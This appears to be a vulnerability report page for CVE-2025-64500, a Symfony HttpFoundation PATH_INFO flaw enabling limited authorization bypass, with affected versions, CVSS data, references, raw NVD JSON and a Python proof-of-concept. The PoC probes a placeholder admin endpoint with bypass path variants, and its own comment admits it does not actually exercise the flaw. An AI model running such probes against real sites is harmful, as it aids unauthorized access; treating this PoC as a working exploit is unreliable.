Security Vulnerability Report
CVE-2025-64500 CVSS 7.3 HIGH

CVE-2025-64500

Published: 2025-11-12 22:15:50
Last Modified: 2026-01-12 17:49:20

Description

Symfony is a PHP framework for web and console applications and a set of reusable PHP components. Symfony's HttpFoundation component defines an object-oriented layer for the HTTP specification. Starting in version 2.0.0 and prior to version 5.4.50, 6.4.29, and 7.3.7, the `Request` class improperly interprets some `PATH_INFO` in a way that leads to representing some URLs with a path that doesn't start with a `/`. This can allow bypassing some access control rules that are built with this `/`-prefix assumption. Starting in versions 5.4.50, 6.4.29, and 7.3.7, the `Request` class now ensures that URL paths always start with a `/`.

CVSS Details

CVSS Score: 7.3
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
Weakness: CWE-647

Configurations (Affected Products)

cpe:2.3:a:sensiolabs:httpfoundation:*:*:*:*:*:*:*:* - VULNERABLE (2.0.0 up to but excluding 5.4.50; 6.0.0 up to but excluding 6.4.29; 7.0.0 up to but excluding 7.3.7)
cpe:2.3:a:sensiolabs:symfony:*:*:*:*:*:*:*:* - VULNERABLE (2.0.0 up to but excluding 5.4.50; 6.0.0 up to but excluding 6.4.29; 7.0.0 up to but excluding 7.3.7)
Symfony 2.0.0 - 5.4.49
Symfony 6.0.0 - 6.4.28
Symfony 7.0.0 - 7.3.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-64500 PoC - Symfony PATH_INFO Authorization Bypass
# This PoC demonstrates how a malformed PATH_INFO can bypass access controls
# that assume URL paths start with '/'
#
# Note: PATH_INFO is a server-side (CGI) variable that the web server derives
# from the request line; Symfony's Request reads it from $_SERVER, not from the
# query string. Sending it as a query parameter, as this script does, therefore
# does not exercise the parsing flaw itself. The script is only a coarse probe
# of how the target responds to the listed path variants.

import requests

TARGET_URL = "http://target-site.com/"
VULNERABLE_ENDPOINT = "admin/dashboard"


def test_path_info_bypass():
    """
    Test if the target is vulnerable to PATH_INFO based authorization bypass.
    Some access control rules assume URL paths start with '/'
    """
    headers = {
        "User-Agent": "Mozilla/5.0 (CVE-2025-64500 PoC)",
        "X-Original-URI": f"/{VULNERABLE_ENDPOINT}",
    }

    # Normal request - should be blocked by access control
    normal_request = requests.get(
        TARGET_URL + VULNERABLE_ENDPOINT,
        headers=headers,
        allow_redirects=False,
    )
    print(f"Normal request status: {normal_request.status_code}")

    # Bypass attempt using PATH_INFO without leading '/'
    # This may bypass access controls that incorrectly validate paths
    bypass_paths = [
        VULNERABLE_ENDPOINT,  # Missing leading slash
        ";" + VULNERABLE_ENDPOINT,
        "/.;/" + VULNERABLE_ENDPOINT,
        "/" + VULNERABLE_ENDPOINT + "/.",
    ]

    for bypass_path in bypass_paths:
        try:
            response = requests.get(
                TARGET_URL,
                headers=headers,
                params={"PATH_INFO": bypass_path},
                allow_redirects=False,
            )
            print(f"Bypass path '{bypass_path}': {response.status_code}")
            if response.status_code == 200:
                print(f"[+] Potential bypass detected with path: {bypass_path}")
                return True
        except Exception as e:
            print(f"Error testing {bypass_path}: {e}")

    return False


if __name__ == "__main__":
    print("CVE-2025-64500 Symfony PATH_INFO Bypass Test")
    print("=" * 50)
    test_path_info_bypass()

References

https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/http-foundation/CVE-2025-64500.yaml - Third Party Advisory
https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2025-64500.yaml - Third Party Advisory
https://github.com/symfony/symfony/commit/9962b91b12bb791322fa73836b350836b6db7cac - Patch
https://github.com/symfony/symfony/security/advisories/GHSA-3rg7-wf37-54rm - Vendor Advisory
https://symfony.com/blog/cve-2025-64500-incorrect-parsing-of-path-info-can-lead-to-limited-authorization-bypass - Third Party Advisory

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64500", "sourceIdentifier": "[email protected]", "published": "2025-11-12T22:15:50.127", "lastModified": "2026-01-12T17:49:20.307", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Symfony is a PHP framework for web and console applications and a set of reusable PHP components. Symfony's HttpFoundation component defines an object-oriented layer for the HTTP specification. Starting in version 2.0.0 and prior to version 5.4.50, 6.4.29, and 7.3.7, the `Request` class improperly interprets some `PATH_INFO` in a way that leads to representing some URLs with a path that doesn't start with a `/`. This can allow bypassing some access control rules that are built with this `/`-prefix assumption. Starting in versions 5.4.50, 6.4.29, and 7.3.7, the `Request` class now ensures that URL paths always start with a `/`."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-647"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sensiolabs:httpfoundation:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0.0", "versionEndExcluding": "5.4.50", "matchCriteriaId": "5D588185-C231-41DD-AE26-9EF1B0455E74"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sensiolabs:httpfoundation:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0.0", "versionEndExcluding": "6.4.29", "matchCriteriaId": 
"BB2A74C0-A989-4BAB-BDB3-0A65864B562A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sensiolabs:httpfoundation:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.3.7", "matchCriteriaId": "3F169B04-38C4-4825-A5A2-F010F1BC3D82"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sensiolabs:symfony:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0.0", "versionEndExcluding": "5.4.50", "matchCriteriaId": "6E3ADEC4-C8AE-415E-969F-5B4D1C1C701C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sensiolabs:symfony:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0.0", "versionEndExcluding": "6.4.29", "matchCriteriaId": "6E769614-2F0D-4DD4-871D-8AE245F3EC9C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sensiolabs:symfony:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.3.7", "matchCriteriaId": "6AFA7FF2-0E23-4EC8-923E-3A4A69C75B13"}]}]}], "references": [{"url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/http-foundation/CVE-2025-64500.yaml", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2025-64500.yaml", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/symfony/symfony/commit/9962b91b12bb791322fa73836b350836b6db7cac", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/symfony/symfony/security/advisories/GHSA-3rg7-wf37-54rm", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://symfony.com/blog/cve-2025-64500-incorrect-parsing-of-path-info-can-lead-to-limited-authorization-bypass", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}